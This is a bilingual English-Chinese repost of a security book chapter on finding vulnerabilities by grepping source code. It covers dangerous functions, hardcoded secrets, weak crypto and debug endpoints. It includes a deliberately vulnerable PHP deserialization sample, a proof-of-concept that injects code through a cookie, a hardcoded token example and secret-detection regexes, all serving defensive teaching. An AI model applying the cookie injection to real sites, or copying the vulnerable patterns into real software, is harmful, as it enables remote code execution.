返回介绍

The Fast Approach: grep Is Your Best Friend

发布于 2024-10-11 20:34:06 字数 18103 浏览 0 评论 0 收藏 0

There are several ways to go about hunting for vulnerabilities in source code, depending on how thorough you want to be. We’ll begin with what I call the “I’ll take what I can get” strategy. It works great if you want to maximize the number of bugs found in a short time. These techniques are speedy and often lead to the discovery of some of the most severe vulnerabilities, but they tend to leave out the more subtle bugs.

有几种方法可以猎取源代码中的漏洞,根据你想要多么彻底。我们将从我所谓的“我会拿到什么就用什么”策略开始。如果您想在短时间内最大化发现错误数量,则该策略非常有效。这些技术速度很快,通常会导致发现一些最严重的漏洞,但它们往往会忽略更微妙的漏洞。

Dangerous Patterns

Using the grep command, look for specific functions, strings, keywords, and coding patterns that are known to be dangerous. For example, the use of the eval() function in PHP can indicate a possible code injection vulnerability.

使用 grep 命令,查找已知为危险的特定函数、字符串、关键字和编码模式。例如,PHP 中使用 eval() 函数可能会暴露代码注入漏洞。

To see how, imagine you search for eval() and pull up the following code snippet:

想要了解,可以想象一下您搜索 eval()并拉出以下代码片段:

<?php
  [...]
  class UserFunction
  {
    private $hook;   
    function __construct(){
      [...]
    }   
    function __wakeup(){
    1 if (isset($this->hook)) eval($this->hook);
    }
  }
  [...]
2 $user_data = unserialize($_COOKIE['data']);
  [...]
?>

In this example, $_COOKIE['data'] 2 retrieves a user cookie named data . The eval() function 1 executes the PHP code represented by the string passed in. Put together, this piece of code takes a user cookie named data and unserializes it. The application also defines a class named UserFunction , which runs eval() on the string stored in the instance’s $hook property when unserialized.

在这个例子中,$_COOKIE ['data']会检索名为 data 的用户 Cookie。eval () 函数会执行传入的字符串所代表的 PHP 代码。将它们放在一起,这段代码会获取名为 data 的用户 Cookie 并对其进行反序列化。此应用程序还定义了一个名为 UserFunction 的类,当反序列化时会对实例的$hook 属性中存储的字符串运行 eval()。

This code contains an insecure deserialization vulnerability, leading to an RCE. That’s because the application takes user input from a user’s cookie and plugs it directly into an unserialize() function. As a result, users can make unserialize() initiate any class the application has access to by constructing a serialized object and passing it into the data cookie.

该代码包含一个不安全的反序列化漏洞,导致远程代码执行。这是因为应用程序从用户的 cookie 中获取用户输入,并直接插入到一个反序列化(unserialize)函数中。因此,用户可以使用构造的序列化对象将 unserialize() 引发应用程序可以访问的任何类。

You can achieve RCE by using this deserialization flaw because it passes a user-provided object into unserialize() , and the UserFunction class runs eval() on user-provided input, which means users can make the application execute arbitrary user code. To exploit this RCE, you simply have to set your data cookie to a serialized UserFunction object with the hook property set to whatever PHP code you want. You can generate the serialized object by using the following bit of code:

使用此反序列化漏洞您可以实现 RCE,因为它会将用户提供的对象传递到 unserialize() 函数中,而 UserFunction 类在用户提供的输入上运行 eval() 函数,这意味着用户可以让应用程序执行任意用户代码。要利用这个 RCE,您只需将数据 cookie 设置为序列化的 UserFunction 对象,并将钩子属性设置为您想要的任何 PHP 代码。您可以使用以下代码生成序列化的对象:

<?php
  class UserFunction
  {
    private $hook = "phpinfo();";
  }
  print urlencode(serialize(new UserFunction));

?>

Passing the resulting string into the data cookie will cause the code phpinfo(); to be executed. This example is taken from OWASP’s PHP object injection guide at https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection . You can learn more about insecure deserialization vulnerabilities in Chapter 14 .

将生成的字符串传递到数据 cookie 中将导致执行 phpinfo()代码。该示例取自 OWASP 的 PHP 对象注入指南,网址为 https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection。您可以在第 14 章中了解有关不安全反序列化漏洞的更多信息。

When you are just starting out reviewing a piece of source code, focus on the search for dangerous functions used on user-controlled data. Table 22-1 lists a few examples of dangerous functions to look out for. The presence of these functions does not guarantee a vulnerability, but can alert you to possible vulnerabilities.

当您刚开始审查源代码时,重点关注对用户控制的数据使用的危险函数的搜索。表 22-1 列出了一些要注意的危险函数的示例。这些函数的存在并不保证漏洞的存在,但可以提醒您可能存在漏洞。

Table 22-1 : Potentially Vulnerable Functions

表 22-1:可能有漏洞的功能

LanguageFunctionPossible vulnerability
PHPeval() , assert() , system() , exec() , shell_exec() , passthru() , popen() , backticks (` CODE `) , include() , require()RCE if used on unsanitized user input.
eval() and assert() execute PHP code in its input, while system() , exec() , shell_exec() , passthru() , popen() , and backticks execute system commands. include() and require() can be used to execute PHP code by feeding the function a URL to a remote PHP script.
PHPunserialize()Insecure deserialization if used on unsanitized user input.
Pythoneval() , exec() , os.system()RCE if used on unsanitized user input.
Pythonpickle.loads() , yaml.load()Insecure deserialization if used on unsanitized user input.
JavaScriptdocument.write() , document.writelnXSS if used on unsanitized user input. These functions write to the HTML document. So if attackers can control the value passed into it on a victim’s page, the attacker can write JavaScript onto a victim’s page.
JavaScriptdocument.location.href()Open redirect when used on unsanitized user input. document.location.href() changes the location of the user’s page.
RubySystem() , exec() , %x() , backticks (` CODE `)RCE if used on unsanitized user input.
RubyMarshall.load() , yaml.load()Insecure deserialization if used on unsanitized user input.

Leaked Secrets and Weak Encryption

Look for leaked secrets and credentials. Sometimes developers make the mistake of hardcoding secrets such as API keys, encryption keys, and database passwords into source code. When that source code is leaked to an attacker, the attacker can use these credentials to access the company’s assets. For example, I’ve found hardcoded API keys in the JavaScript files of web applications.

寻找泄露的秘密和凭据。有时,开发人员会错误地将秘密(如 API 密钥、加密密钥和数据库密码)硬编码到源代码中。当该源代码泄露给攻击者时,攻击者可以使用这些凭据访问公司的资产。例如,我曾在 Web 应用程序的 JavaScript 文件中发现硬编码的 API 密钥。

You can look for these issues by grepping for keywords such as key , secret , password , encrypt , API , login , or token . You can also regex search for hex or base64 strings, depending on the key format of the credentials you’re looking for. For instance, GitHub access tokens are lowercase, 40-character hex strings. A search pattern like [a-f0-9]{40} would find them in the source code. This search pattern matches strings that are 40 characters long and contains only digits and the hex letters a to f .

您可以通过使用关键字,如 key、secret、password、encrypt、API、login 或 token 进行 grep 来查找这些问题。您还可以使用正则表达式搜索十六进制或 Base64 字符串,具体取决于您要查找的凭证的键格式。例如,GitHub 访问令牌是小写的 40 个字符的十六进制字符串。像[a-f0-9] {40}这样的搜索模式可以在源代码中找到它们。此搜索模式匹配长度为 40 个字符且仅包含数字和十六进制字母 a 到 f 的字符串。

When searching, you might pull up a section of code like this one, written in Python:

在搜索时,你可能会找到像这样的 Python 代码部分:

import requests

1 GITHUB_ACCESS_TOKEN = "0518fb3b4f52a1494576eee7ed7c75ae8948ce70"
headers = {"Authorization": "token {}".format(GITHUB_ACCESS_TOKEN), \
"Accept": "application/vnd.github.v3+json"}
api_host = "https://api.github.com"
2 usernames = ["vickie"] # List users to analyze

def request_page(path):
  resp = requests.Response()
  try: resp = requests.get(url=path, headers=headers, timeout=15, verify=False)
  except: pass
  return resp.json()

3 def find_repos():
  # Find repositories owned by the users.
  for username in usernames:
    path = "{}/users/{}/repos".format(api_host, username)
    resp = request_page(path)
    for repo in resp:
      print(repo["name"])

if __name__ == "__main__":
  find_repos()

This Python program takes in the username of a user from GitHub 2 and prints out the names of all the user’s repositories 3 . This is probably an internal script used to monitor the organization’s assets. But this code contains a hardcoded credential, as the developer hardcoded a GitHub access token into the source code 1 . Once the source code is leaked, the API key becomes public information.

这个 Python 程序从 GitHub2 中接受用户的用户名,然后打印出该用户所有的存储库名称 3。这可能是用于监控组织资产的内部脚本。但这段代码包含一个硬编码的凭据,因为开发人员在源代码中硬编码了一个 GitHub 访问令牌 1。一旦源代码泄露,API 密钥就成为公共信息。

Entropy scanning can help you find secrets that don’t adhere to a specific format. In computing, entropy is a measurement of how random and unpredictable something is. For instance, a string composed of only one repeated character, like aaaaa , has very low entropy. A longer string with a larger set of characters, like wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY , has higher entropy. Entropy is therefore a good tool to find highly randomized and complex strings, which often indicate a secret. TruffleHog by Dylan Ayrey ( https://github.com/trufflesecurity/truffleHog/ ) is a tool that searches for secrets by using both regex and entropy scanning.

熵扫描可以帮助您找到不符合特定格式的秘密。在计算机中,熵是衡量某物有多随机和不可预测的尺度。例如,由一个重复字符组成的字符串,如 aaaaa,熵非常低。而一个由更多字符组成的较长字符串,如 wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY,熵较高。因此,熵是寻找高度随机和复杂的字符串的好工具,这往往意味着一个秘密。Dylan Ayrey 的 TruffleHog(https://github.com/trufflesecurity/truffleHog/)是一种同时使用正则表达式和熵扫描来搜索秘密的工具。

Finally, look for the use of weak cryptography or hashing algorithms. This issue is hard to find during black-box testing but easy to spot when reviewing source code. Look for issues such as weak encryption keys, breakable encryption algorithms, and weak hashing algorithms. Grep the names of weak algorithms like ECB, MD4, and MD5. The application might have functions named after these algorithms, such as ecb() , create_md4() , or md5_hash(). It might also have variables with the name of the algorithm, like ecb_key , and so on. The impact of weak hashing algorithms depends on where they are used. If they are used to hash values that are not considered security sensitive, their usage will have less of an impact than if they are used to hash passwords.

最后,寻找弱密码学或哈希算法的使用。在黑盒测试期间,这个问题很难发现,但在代码审查时很容易发现。寻找弱加密密钥、易破解的加密算法和弱哈希算法等问题。Grep 弱算法的名称,如 ECB、MD4 和 MD5。应用程序可能有以这些算法命名的函数,例如 ecb()、create_md4() 或 md5_hash()。它还可能有以算法名称命名的变量,例如 ecb_key 等。弱哈希算法的影响取决于它们的使用位置。如果它们用于哈希不被视为安全敏感的值,则它们的使用将比用于哈希密码时产生更少的影响。

New Patches and Outdated Dependencies

If you have access to the commit or change history of the source code, you can also focus your attention on the most recent code fixes and security patches. Recent changes haven’t stood the test of time and are more likely to contain bugs. Look at the protection mechanisms implemented and see if you can bypass them.

如果您可以访问源代码的提交或更改历史,您也可以将注意力集中在最近的代码修复和安全补丁上。最近的更改还没有经受时间的考验,很可能包含错误。查看已实施的保护机制,看看能否绕过它们。

Also search for the program’s dependencies and check whether any of them are outdated. Grep for specific code import functions in the language you are using with keywords like import , require , and dependencies . Then research the versions they’re using to see if any vulnerabilities are associated with them in the CVE database ( https://cve.mitre.org/ ). The process of scanning an application for vulnerable dependencies is called software composition analysis ( SCA) . The OWASP Dependency-Check tool ( https://owasp.org/www-project-dependency-check/ ) can help you automate this process. Commercial tools with more capabilities exist too.

同时搜索程序的依赖项并检查其中是否有过时的内容。使用关键词如 import、require 和依赖项来在所使用的编程语言中查找特定的代码导入函数。然后研究它们所使用的版本,以确定它们是否在 CVE 数据库(https://cve.mitre.org/)中有与之相关的漏洞。扫描程序中的易受攻击依赖关系的过程称为软件组成分析(SCA)。OWASP 依赖项检查工具(https://owasp.org/www-project-dependency-check/)可以帮助您自动化此过程。也存在更具能力的商业工具。

Developer Comments

You should also look for developer comments and hidden debug functionalities, and accidentally exposed configuration files. These are resources that developers often forget about, and they leave the application in a dangerous state.

你还应该寻找开发者的注释、隐藏的调试功能和意外暴露的配置文件。这些资源开发者经常会忘记,留下了应用处于危险状态。

Developer comments can point out obvious programming mistakes. For example, some developers like to put comments in their code to remind themselves of incomplete tasks. They might write comments like this, which points out vulnerabilities in the code:

开发人员的评论可以指出明显的编程错误。例如,一些开发人员喜欢在代码中放置评论来提醒自己有未完成的任务。他们可能会写出像这样的注释,指出代码中的漏洞:

# todo: Implement CSRF protection on the change_password endpoint.

You can find developer comments by searching for the comment characters of each programming language. In Python, it’s # . In Java, JavaScript, and C++, it’s // . You can also search for terms like todo , fix , completed , config , setup , and removed in source code.

你可以通过搜索每种编程语言的注释字符来找到开发者的评论。在 Python 中,它是 #。在 Java、JavaScript 和 C++ 中,它是//。你也可以在源代码中搜索 todo、fix、completed、config、setup 和 removed 等词汇。

Debug Functionalities, Configuration Files, and Endpoints

Hidden debug functionalities often lead to privilege escalation, as they’re intended to let the developers themselves bypass protection mechanisms. You can often find them at special endpoints, so search for strings like HTTP , HTTPS , FTP , and dev . For example, you might find a URL like this somewhere in the code that points you to an admin panel:

隐藏的调试功能通常会导致权限升级,因为它们旨在让开发人员自己绕过保护机制。您可以经常在特殊的端点上找到它们,因此搜索像 HTTP、HTTPS、FTP 和 dev 之类的字符串。例如,在代码中可能会找到这样一个 URL,指向管理员面板。

http://dev.example.com/admin?debug=1&password=password # Access debug panel

Configuration files allow you to gain more information about the target application and might contain credentials. You can look for filepaths to configuration files in source code as well. Configuration files often have the file extensions .conf , .env , .cnf , .cfg , .cf , .ini , .sys , or .plist .

配置文件可帮助您获取有关目标应用程序的更多信息,并可能包含凭据。您还可以在源代码中查找配置文件的文件路径。配置文件通常具有文件扩展名.conf、.env、.cnf、.cfg、.cf、.ini、.sys 或.plist。 配置文件能让你获取有关目标应用程序的更多信息,并可能包含凭据。在源代码中也可以查找文件路径以获取配置文件。配置文件通常使用以下文件扩展名.conf、.env、.cnf、.cfg、.cf、.ini、.sys 或.plist。

Next, look for additional paths, deprecated endpoints, and endpoints in development. These are endpoints that users might not encounter when using the application normally. But if they work and are discovered by an attacker, they can lead to vulnerabilities such as authentication bypass and sensitive information leak, depending on the exposed endpoint. You can search for strings and characters that indicate URLs like HTTP , HTTPS , slashes (/), URL parameter markers (?), file extensions ( .php , .html , .js , .json ), and so on.

接下来,寻找其他路径、已弃用的终端和正在开发中的终端。这些终端在用户正常使用应用程序时可能不会遇到。但如果它们可以工作并被攻击者发现,可能会导致漏洞,比如认证绕过和敏感信息泄露,这取决于暴露的终端。你可以搜索一些 URL 指示字符和字符串,比如 HTTP、HTTPS、斜杠 (/)、URL 参数标记 (?), 文件扩展名 (.php、.html、.js、.json) 等等。

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文